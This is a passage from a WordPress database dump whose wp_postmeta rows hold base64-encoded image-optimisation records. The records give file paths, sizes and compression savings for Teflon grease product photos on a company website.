lbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVdMRy1KQVItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVdMRy1KQVItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI0MzIsImlkIjoxODEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1XTEctSkFSLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1XTEctSkFSLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1XTEctSkFSLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNDM1LCJpZCI6MTgxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtV0xHLUpBUi05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVdMRy1KQVItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtV0xHLUpBUi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjEyMiwidGltZSI6MTQ4MzU2MjQzOCwiaWQiOjE4MTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29140, 1812, 'wpfc_optimisation_reduction', '25343'); 
INSERT INTO `wp_postmeta` VALUES (29141, 1812, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MjQ0MywiaWQiOiIxODEyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjg5NiwidGltZSI6MTQ4MzU2MjQ0NiwiaWQiOjE4MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTE1LCJ0aW1lIjoxNDgzNTYyNDUwLCJpZCI6MTgxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2MjYsInRpbWUiOjE0ODM1NjI0NTMsImlkIjoxODEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMjIwNywidGltZSI6MTQ4MzU2MjQ1NywiaWQiOjE4MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1OTQsInRpbWUiOjE0ODM1NjI0NjEsImlkIjoxODEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTYyNDY0LCJpZCI6MTgxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU1NSwidGltZSI6MTQ4MzU2MjQ2NywiaWQiOjE4MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODg2LCJ0aW1lIjoxNDgzNTYyNDcxLCJpZCI6MTgxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDE1LCJ0aW1lIjoxNDgzNTYyNDc0LCJpZCI6MTgxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NzA4LCJ0aW1lIjoxNDgzNTYyNDc4LCJpZCI6MTgxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjYxLCJ0aW1lIjoxNDgzNTYyNDgyLCJpZCI6MTgxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC1BRVJPU09MLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTg1LCJ0aW1lIjoxNDgzNTYyNDg1LCJpZCI6MTgxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLUFFUk9TT0wtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtQUVST1NPTC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NiwidGltZSI6MTQ4MzU2MjQ4OCwiaWQiOjE4MTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29142, 1811, 'wpfc_optimisation_reduction', '21880'); 
INSERT INTO `wp_postmeta` VALUES (29143, 1811, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYyNDkzLCJpZCI6IjE4MTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzkxLCJ0aW1lIjoxNDgzNTYyNDk3LCJpZCI6MTgxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI1MDQsInRpbWUiOjE0ODM1NjI1MDAsImlkIjoxODExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjI0NiwidGltZSI6MTQ4MzU2MjUwNCwiaWQiOjE4MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEwMjczLCJ0aW1lIjoxNDgzNTYyNTA4LCJpZCI6MTgxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU1NiwidGltZSI6MTQ4MzU2MjUxMSwiaWQiOjE4MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzEsInRpbWUiOjE0ODM1NjI1MTUsImlkIjoxODExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTMyLCJ0aW1lIjoxNDgzNTYyNTE4LCJpZCI6MTgxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRXTC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFdMLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UV0wtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE1NTksInRpbWUiOjE0ODM1NjI1M